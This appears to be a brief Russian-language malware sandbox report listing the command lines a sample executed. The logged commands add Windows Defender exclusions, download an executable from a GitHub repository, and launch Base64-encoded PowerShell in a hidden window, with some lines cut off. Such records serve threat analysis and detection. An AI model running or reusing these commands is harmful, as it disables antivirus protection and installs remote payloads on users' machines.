Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath $env:USERPROFILE -FORCE ; Add-MpPreference -ExclusionPath %WINDIR% -FORCE ; CURL -O $env:TEMP\ShellHost.exe https://github.com/alex37891r-sketch/ffff/raw/refs/he...
- DNS ASK gi##ub.com
- '<SYSTEM32>\cmd.exe' /c Powershell -enc UwBUAEEAUgBUACAAUABPAFcARQBSAFMASABFAEwATAAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIAAtAEEAIAAnAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAG...
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -enc UwBUAEEAUgBUACAAUABPAFcARQBSAFMASABFAEwATAAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIAAtAEEAIAAnAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0...
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath $env:USERPROFILE -FORCE ; Add-MpPreference -ExclusionPath %WINDIR% -FORCE ; CURL -O $env:TEMP\ShellHost.exe https://github.com/alex37891r-sketch/ffff/raw/refs/he... (со скрытым окном)